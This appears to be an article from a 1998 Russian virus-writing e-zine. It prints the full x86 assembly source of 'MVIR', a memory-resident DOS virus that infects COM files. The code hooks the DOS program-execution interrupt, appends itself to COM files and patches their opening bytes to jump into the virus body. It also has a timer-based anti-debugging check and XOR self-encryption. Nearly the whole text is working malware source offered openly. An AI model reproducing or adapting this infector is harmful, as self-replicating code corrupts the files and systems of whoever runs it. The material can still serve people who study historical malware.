[TulaAnti&ViralClub] PRESENTS ...
MooN_BuG, Issue 7, Sep 1998 file 010
Вирус MVIR
by Unknown
=== Cut ==
.286
codesg segment
assume cs:codesg
org 100h
begin:
mov si,offset start
jmp si
db 7fh
;
; Тело зараженной программы
;
org 200h
start:
; si = offset start ;addres of first progrem block begin
add si,offset old_byte - 200h
; DS==ES==CS==PSP
;
mov di,0100h
mov cx,3 ; moving 6 byte of program
rep movsw
in ax,42h
xchg ax,bx
in ax,42h
cmp ax,bx
jnz anti_done
mov cx,7f7fh
anti_done:
mov ax,300h
xchg cx,ax
sub si,offset old_byte + 6 -200h
push si
crypt:
xor word ptr ds:[si],ax
inc si
loop crypt
;--------------------- Test present in memory --------------
pop si
mov ds,cx
cmp word ptr ds :[Virus_ID],'lO'
je next
;--------------------- Move Virus Body ---------------------
push ds
push cs
pop ds
mov di,0200h
pop es
;es set to 0
mov cx,150 ;Virus Size
rep movsw
; Сохраняем старый int 21 в перемещенном коде вируса 0:200h
;
push es
pop ds
les bx,ds:[21h*4]
mov word ptr ds:intold,bx
mov word ptr ds:intold+2,es
mov dx,offset work_p
mov ax,2521h
int 21h
next:
push cs
pop ds
push cs
pop es
mov di,100h
jmp di
;---------- Старые 6 байт зараженной проги -----------------
old_byte:
db 90h,90h,90h, 90h,90h,0c3h
;------------------ Main part of virus ---------------------
work_p:
Pushf
cmp ax,4b00h
jne oldint ;Test
push ax
push bx
push cx
push dx
push es
push ds
call vmain
pop ds
pop es
pop dx
pop cx
pop bx
pop ax
oldint:
Popf
db 0eah
intold dd 0
;------------------------
vmain proc
mov ax,3524h
int 21h
mov word ptr cs:int_24h,bx
mov word ptr cs:int_24h+2,es
;-------------- Open file ----------------------------------
mov ax,word ptr cs:[offset ax_3d02h - offset start +200h]
; mov ax,3d02h
int 21h
jc exitv
XCHG bx,ax
push cs
pop ds
mov dx,offset iret_pointer
mov ax,2524h
int 21h
; Read first 4 byte of program
mov ah,3fh ;bx :file handle;
; ds set to 0h
mov dx,offset old_byte ; хранятся старые 6 байт проги
mov cx,6
int 21h
CMP WORD PTR ds:[offset old_byte],'ZM' ;Test .exe file
je close
cmp word ptr ds:[offset old_byte+3],0e6ffh ; Virus ID
je close
mov al,2 ; set fhandle to end of file
call setfilep
jc exitv
cmp ax,1220
jbe close ; if ax<1220 then close file
add ax,100h
mov word ptr offset ds:root +1,ax ; Restore new value
mov dx,200h ; Virus start
mov cx,offset int_24h - offset start ; Тело вируса
mov ah,byte ptr ds:[offset ah_40h - offset start +200h]
int 21h
; + 6 Байт
jc exitv ; старой проги
cmp cx,offset int_24h - offset start ;
jne exitv
;--------------- Add virus boot ----------------------------
sub al,al
call setfilep
jc exitv
mov cx,6
mov dx,offset root ;adress of virus boot
mov ah,byte ptr ds:[offset ah_40h - offset start +200h]
int 21h
;--------------- Close file --------------------------------
close:
mov ah,3eh
int 21h
exitv:
lds dx,cs:[int_24h]
mov ax,2524h
int 21h
ret
vmain endp
setfilep proc
mov ah,42h
sub cx,cx
sub dx,dx
int 21h
ret
setfilep endp
Virus_ID db 'Ol'
Num_EXEC db 0
iret_pointer:
mov al,3
iret
ah_40h db 40h ; Write
ax_3d02h dw 3d02h ; Open
;================= Загрущик вируса =========================
root:
mov si,offset old_byte
jmp si
db 7fh
;===========================================================
int_24h dd 0
codesg ends
end begin
=== Cut ==